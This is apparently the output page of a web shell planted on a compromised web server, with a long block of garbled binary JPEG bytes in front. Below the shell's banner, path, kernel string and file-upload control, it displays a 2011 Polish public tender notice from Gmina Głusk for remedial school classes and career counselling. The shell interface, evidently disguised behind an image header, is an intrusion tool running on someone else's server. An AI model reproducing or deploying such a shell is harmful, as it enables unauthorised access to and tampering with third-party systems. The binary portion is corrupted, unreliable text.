JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111019/343280-N-2011.html

<p class="kh_header"><b>Lublin: KOMPETENTNE SZKOŁY GMINY GŁUSK</b><br>
<b>Numer ogłoszenia: 343280 - 2011; data zamieszczenia: 19.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Głusk , ul. Głuska 140, 20-380 Lublin, woj. lubelskie, tel. 081 7518760, faks 081 7518650.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glusk.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPETENTNE SZKOŁY GMINY GŁUSK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zajęcia dydaktyczno-wyrównawcze z przedmiotów matematyczno-przyrodniczych.
Prowadzone metodą warsztatową aktywizującą ukierunkowane na wyrównanie dysproporcji 
w osiągnięciach edukacyjnych. Aktywne formy nauki wspomagane będą nowoczesną techniką - tablice multimedialne udostępnione przez Zamawiającego. W ramach projektu zaplanowano:
1) 30 h zajęć dla każdej 8 osobowej gr. z następujących bloków: 
a) matematyka 28 grup w wymiarze 1h/tyg.,
b) chemia 1 grupa, w wymiarze 1h/tyg.
2) 60 h zajęć z bloku przyroda dla 4 grup , w wymiarze 2h/tyg. 
Zajęcia będą realizowane w terminie do VI.2012 r. W ramach zajęć przyrodniczych zaplanowano 
3 wycieczki edukacyjne do Narodowego Parku Poleskiego w Urszulinie. Nauczyciel prowadzący zajęcia zobowiązany jest do opracowania szczegółowego programu wycieczek. W ramach zajęć uczniom  zapewnione zostaną przez Zamawiającego materiały dydaktyczne. Nauczyciele zobowiązani są  promować w trakcie zajęć równość szans.
Nauczyciele prowadzący odpowiedzialni są za osiągnięcie w wyniku realizacji zajęć następujących produktów: liczba uczestników zajęć - max. 264 osoby, liczba testów sprawdzających - 422 szt., liczba godzin szkolenia - 1110 h, liczba wycieczek edukacyjnych - 3 szt. Źródłem pomiaru wskaźników będą prowadzone przez nauczycieli i zatwierdzone przez Koordynatorów merytorycznych oraz Kierownika projektu dzienniki zajęć, w tym  listy obecności, opracowane przez nauczycieli 
i wypełnione przez uczniów testy wiedzy, sporządzone przez nauczycieli protokoły z wyjazdów.
Nauczyciele zobowiązani są do przeprowadzenia zajęć tak, aby w wyniku ich realizacji (do końca VI.2012 r.) nastąpiło zwiększenie o co najmniej 20% poziomu wiedzy z zakresu nauk matematyczno-przyrodniczych u co najmniej 211 uczniów. 
UWAGA: Nauczyciele zobowiązani będą do udostępniania ćwiczeń na uruchomionej przez Zamawiającego platformie e-learningowej.

Zajęcia dydaktyczno-wyrównawcze z języka polskiego.
Prowadzone metodą warsztatową aktywizującą ukierunkowane na wyrównanie dysproporcji 
w osiągnięciach edukacyjnych. Mają na celu podniesienie wyników nauczania. Zaplanowano 30h zajęć dla każdej z 28 grup, każda po 8 os. (łącznie 224). Zajęcia będą realizowane w terminie do VI.2012 r. w wymiarze 1h/tyg. W ramach zajęć uczniom  zapewnione zostaną przez Zamawiającego materiały dydaktyczne. Nauczyciele zobowiązani są  promować w trakcie zajęć równość szans.
Nauczyciele prowadzący odpowiedzialni są za osiągnięcie w wyniku realizacji zajęć następujących produktów: liczba uczestników zajęć - max.224 os., liczba testów sprawdzających - 358 szt., liczba godzin szkolenia  840 h. Źródłem pomiaru wskaźników będą prowadzone przez nauczycieli 
i zatwierdzone przez Koordynatorów merytorycznych oraz Kierownika projektu dzienniki zajęć, w tym  listy obecności, opracowane przez nauczycieli i wypełnione przez uczniów testy wiedzy. Nauczyciele zobowiązani są do przeprowadzenia zajęć tak, aby w wyniku ich realizacji (do końca VI.2012 r.) nastąpiło zwiększenie o co najmniej 20% poziomu umiejętności językowych u co najmniej 
371 uczniów. 
UWAGA: Nauczyciele zobowiązani będą do udostępniania ćwiczeń na uruchomionej przez Zamawiającego platformie e-learningowej.

Szkolny Ośrodek Kariery (SZOK).
W ramach SzOKu prowadzone będą zajęcia z psychologiem i doradcą zawodowym, które pozwolą uczestnikom na określenie swoich mocnych stron i ich optymalne wykorzystanie w procesie nauki, podejmowanie decyzji o wyborze szkoły wyższej oraz przyczynią się do wzrostu pewności siebie. Zaplanowano:
1) po 10h zajęć grupowych z doradztwa zawodowego oraz po 10 h zajęć grupowych z psychologiem dla 24 grup (10 osobowe). W sumie 240 uczestników zajęć.
2) 2 h/1 os. konsultacji indywidualnych z doradztwa zawodowego (1 h) i wsparcia psychologicznego 
(1 h) dla 120 uczestników zajęć. 
Zajęcia będą realizowane w terminie do VI.2012 r. z częstotliwością 1-2h dziennie. W ramach zajęć uczniowie otrzymają od Zamawiającego materiały dydaktyczne. Nauczyciele zobowiązani są  promować w trakcie zajęć równość szans. Nauczyciele prowadzący odpowiedzialni są za osiągnięcie w wyniku realizacji zajęć następujących produktów: liczba uczestników zajęć - max. 244 os., liczba godzin zajęć - 720 h, liczba kart obserwacji - 384 szt., liczba kart rozwoju ucznia - 96 szt. Źródłem pomiaru wskaźników będą prowadzone przez nauczycieli i zatwierdzone przez Koordynatorów merytorycznych oraz Kierownika projektu dzienniki zajęć, w tym  listy obecności, opracowane przez nauczycieli karty obserwacji i rozwoju uczestników zajęć. Nauczyciele zobowiązani są do przeprowadzenia zajęć tak, aby w wyniku ich realizacji (do końca VI.2012 r.) nastąpiło zwiększenie poziomu umiejętności planowania kariery edukacyjnej i wzrost samooceny u uczniów korzystających 
z zajęć.
UWAGA: Wykonawcy zobowiązani będą do udostępniania ćwiczeń/testów na uruchomionej przez Zamawiającego platformie e-learningowej.

Zamawiający  dopuszcza  składanie ofert częściowych: 
na poszczególne szkoły, minimum na jedną grupę uczniów dla poszczególnych zajęć, 
wg zamieszczonego poniżej opisu.

Wymóg minimum na jedną grupę uczniów dla poszczególnych zajęć nie dotyczy zajęć 
w ramach SZOK. Oferty złożone na zajęcia w ramach SZOK muszą obejmować wszystkie grupy w ramach danego Zespołu Szkół, jedynie z możliwością podziału na doradcę zawodowego oraz psychologa.
1. Zespół Szkół w Kalinówce:
Część 1.1  zajęcia dydaktyczno wyrównawcze z matematyki - po 30 godz. dla 5 grup SP (liczba uczniów w każdej grupie - 8),
Część 1.2 zajęcia dydaktyczno wyrównawcze z matematyki - po 30 godz. dla 5 grup Gim. (liczba uczniów w każdej grupie - 8)
Część 1.3  zajęcia  dydaktyczno wyrównawcze z języka polskiego - po  30 godz. dla 5 grup SP (liczba uczniów w każdej grupie - 8), 
Część 1.4 zajęcia  dydaktyczno wyrównawcze z języka polskiego - po  30 godz. dla 5 grup Gim. (liczba uczniów w każdej grupie - 8),
Część 1.5 Szkolny Ośrodek Kariery - doradztwo zawodowe - po 10 godz. zajęć grupowych dla 5 grup Gim. (liczba uczniów w grupie - 10) oraz 25 godz. zajęć indywidualnych - po 1godz./os. dla 25 uczniów Gim.
Część 1.6 Szkolny Ośrodek Kariery - psycholog - po 10 godz. zajęć grupowych dla 5 grup Gim. (liczba uczniów w grupie - 10) oraz 25 godz. zajęć indywidualnych - po 1godz./os. dla 25 uczniów Gim.
2. Zespół Szkół w Wilczopolu:
Część 2.1  zajęcia dydaktyczno wyrównawcze z matematyki -  po 30 godz. dla 3 grup  SP. (liczba uczniów w każdej grupie - 8 os.),
Część 2.2 zajęcia dydaktyczno wyrównawcze z matematyki -  po 30 godz. dla 3 grup Gim. (liczba uczniów w każdej grupie - 8 os.),
Część 2.3  zajęcia  dydaktyczno wyrównawcze z języka polskiego - po  30 godz. dla 3 grup SP (liczba uczniów w każdej grupie - 8 os.),
Część 2.4 zajęcia  dydaktyczno wyrównawcze z języka polskiego - po  30 godz. dla 3 grup Gim. (liczba uczniów w każdej grupie - 8 os.),
Część 2.5 Szkolny Ośrodek Kariery - doradztwo zawodowe - po 10 godz. zajęć grupowych dla 5 grup Gim. (liczba uczniów w grupie- 10) oraz 25 godz. zajęć indywidualnych - po 1h/os. dla 25 Część uczniów Gim.
Część 2.6 Szkolny Ośrodek Kariery - psycholog - po 10 godz. zajęć grupowych dla 5 grup Gim. (liczba uczniów w grupie - 10 os.) oraz 25 godz. zajęć indywidualnych - po 1h/os. dla 25 uczniów Gim.
3. SP w Prawiednikach:
Część 3.1  zajęcia dydaktyczno wyrównawcze z matematyki - po 30 godz. dla 2  grup SP. (liczba uczniów w każdej grupie - 8 os.),
Część 3.2  zajęcia dydaktyczno wyrównawcze z przyrody - po  60 godz. dla 2 grup SP. (liczba uczniów w każdej grupie - 8 os.),
Część 3.3  zajęcia dydaktyczno wyrównawcze z języka polskiego -  po 30 godz.  dla  2 grup SP. (liczba uczniów w każdej grupie - 8 os.).
4. Zespół Szkół w Mętowie:
Część 4.1  zajęcia dydaktyczno wyrównawcze z matematyki - po 30 godz. dla  5  grup z SP (liczba uczniów w każdej grupie - 8 os.),
Część 4.2 zajęcia dydaktyczno wyrównawcze z matematyki - po 30 godz. dla  5 grup z Gim. (liczba uczniów w każdej grupie - 8 os.),
Część 4.3   zajęcia dydaktyczno wyrównawcze z przyrody - po 60 godz. dla 1 grupy z SP (liczba uczniów w grupie - 8 os.),
Część 4.4 zajęcia dydaktyczno wyrównawcze z przyrody - po 60 godz. dla 1 grupy z Gim. (liczba uczniów  Część w grupie - 8 os.),
Część 4.5  zajęcia dydaktyczno wyrównawcze  z chemii - 30 godz. dla 1 grupy z Gim. (liczba uczniów 
w każdej grupie - 8 os.),
Część 4.6  zajęcia dydaktyczno wyrównawcze z języka polskiego - po 30 godz. dla 5 grup SP (liczba uczniów w każdej grupie - 8 os.), 
Część 4.7 zajęcia dydaktyczno wyrównawcze z języka polskiego - po 30 godz. dla 5 grup Gim. (liczba uczniów w każdej grupie - 8 os.), 
Część 4.8  Szkolny Ośrodek Kariery - doradztwo zawodowe - po 10 godz. zajęć grupowych dla 14 grup Gim. (liczba uczniów w grupie - 10 os.) oraz 70 godz. zajęć indywidualnych - po 1godz./os. dla 70 uczniów Gim.
Część 4.9  Szkolny Ośrodek Kariery - psycholog - po 10 godz. zajęć grupowych dla 14 grup Gim. (liczba uczniów w grupie - 10 os.) oraz 70 godz. zajęć indywidualnych - po 1godz./os. dla 70 uczniów Gim.

Obowiązki prowadzącego zajęcia pozalekcyjne:
a) przeprowadzenie w/w zajęć pozalekcyjnych zgodnie z wcześniej opracowanymi przez Wykonawcę - nauczyciela prowadzącego, programami zajęć, uwzględniającymi przeprowadzoną diagnozę potrzeb uczniów dla poszczególnych grup, w terminie do 30  czerwca 2012 roku, w celu osiągnięcia założonych wskaźników produktu i rezultatu;
b) przeprowadzenie zajęć z wykorzystaniem udostępnionych przez Zamawiającego tablic interaktywnych oraz programów multimedialnych;
c) dokumentowanie zajęć pozalekcyjnych (karty czasu wykonywania zajęć, dzienniki zajęć, listy obecności uczestników i inne dokumenty niezbędne w realizacji projektu);
d) przygotowywanie sprawozdań  miesięcznych z realizacji zajęć.
Miejscem realizacji zamówienia są siedziby szkół podstawowych i gimnazjów  właściwe dla realizacji danej części zamówienia.
Uwaga: 
Wykonawcy będą zobowiązani bezwzględnie dostosować się do ustalonego przez Dyrektora szkoły planu zajęć.

Wynagrodzenie Wykonawcy prowadzącego zajęcia będzie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w myśl art.44 o spełnianiu warunków określonych w art. 22 ust. 1 i art. 26 ust. 2b ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług  w okresie ostatnich 3 lat, przed upływem składania ofert , a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia z podaniem daty i miejsca wykonania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz ze wskazaniem posiadanych kwalifikacji i zakresu wykonywanych czynności oraz z informacją o podstawie do dysponowania tymi osobami
Oświadczenie Wykonawcy potwierdzające, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane kwalifikacje zawodowe i doświadczenie pedagogiczne w pracy w szkole podstawowej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w myśl art.44 o spełnianiu warunków określonych w art. 22 ust. 1 i art. 26 ust. 2b  ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl/glusk<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Głusk ul. Głuska 140 20-385 Lublin pok. nr 8 SZEAS.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2011 godzina 09:00, miejsce: Urząd Gminy Głusk ul. Głuska 140 20-385 Lublin pok. nr 1 SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie pod nazwą Kompetentne szkoły Gminy Głusk finansowane ze środków Europejskiego Funduszu Społecznego UE w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Realizator projektu: Samorządowy Zespół Ekonomiczno - Administracyjny Szkół przy Urzędzie Gminy Głusk, ul. Głuska 140, 20-385 Lublin..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com